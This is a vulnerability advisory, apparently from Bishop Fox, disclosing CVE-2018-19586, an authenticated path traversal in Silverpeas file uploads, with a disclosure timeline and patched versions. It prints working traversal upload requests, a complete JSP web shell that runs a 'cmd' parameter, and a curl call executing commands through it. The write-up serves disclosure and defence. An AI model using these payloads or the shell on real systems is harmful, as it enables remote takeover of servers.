Product Description
From the vendor’s website:
“Silverpeas is an open source WEB platform that improves the collaboration between the actors of a company or organization.” Silverpeas is widely used by many notable French organizations including those in the media, retail, and government space.
Vulnerabilities List
One vulnerability was identified within the Silverpeas 5.15 to 6.0.2 application.
Affected Versions
5.15 to 6.0.2
Solution
If you are using the affected versions of the Silverpeas software, please ensure you have the following mitigations installed:
Path Traversal
Silverpeas 5.15 to 6.0.2 is affected by an authenticated path traversal vulnerability that can be triggered during file uploads. This vulnerability enables regular users to write arbitrary files on the underlying system with the privileges of the user running the application. An attacker may leverage the vulnerability to write an executable JSP file in an exposed web directory and execute commands on the underlying system.
Vulnerability Details
CVE ID: CVE-2018-19586
Access Vector: Remote
Security Risk: Critical
Vulnerability: CWE-23
CVSS Base Score: 9.9
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
The path traversal vulnerability is located in an upload mechanism that is reachable across several other features (e.g., forum, ideas) with regular user privileges. The application takes the upload path from the HTTP header without proper sanitization:
POST /silverpeas/services/fileUpload HTTP/1.1 Host: vulns.lan:8000 …omitted for brevity… Content-Type: application/octet-stream X-FULL-PATH: ../../../../../../../tmp/test.png FILE CONTENT
Figure 1 - File upload with path traversal payload
The file is then created in /tmp:
root@vulns:/tmp# ls -lah | grep -i test -rw-r--r-- 1 root root 201 nov. 16 02:53 test.png
By default, files are uploaded to $SILVERPEAS_HOME/data/temp/[UUID]/, which is outside the application’s main directory. Through the use of the Silverpeas official installer, the core package (containing main Java classes and JSP files) is deployed in a virtual file system (VFS) whose path is randomized and not writable. However, the installer ships another web application resource (WAR) that is reachable under /weblib/ and whose path is not randomized.
The request below can be used to deploy a malicious JSP file:
POST /silverpeas/services/fileUpload HTTP/1.1
Host: vulns.lan:8000
…omitted for brevity…
Content-Type: application/octet-stream
X-FULL-PATH: ../../web/weblib.war/Aurora/css/webshell.jsp
…omitted for brevity…
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"\n"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<%=output %>
Figure 2 - Web shell upload
Command execution can then be achieved by using the deployed file, highlighted below:
$ curl 'http://vulns.lan:8000/weblib/Aurora/css/webshell.jsp?cmd=ls' appclient bin copyright.txt docs domain jboss-modules.jar LICENSE.txt modules README.txt standalone welcome-content
Figure 3 - Successful command execution with deployed web shell
The issue is due to a lack of user-input sanitization in the FileUploadData Java class. For more information, see:
Disclosure Timeline:
- 11/10/2018: Initial discovery for version 6.0.2
- 11/26/2018: Initial notification of product vendor
- 12/01/2018: Versions 5.15 to 6.0.2 discovered to be affected
- 12/14/2018: Patches released for 5.15 and 6.0
Researcher:
Bastien Faure, Security Associate at Bishop Fox
Subscribe to Bishop Fox's Security Blog
Be first to learn about latest tools, advisories, and findings.
Thank You! You have been subscribed.
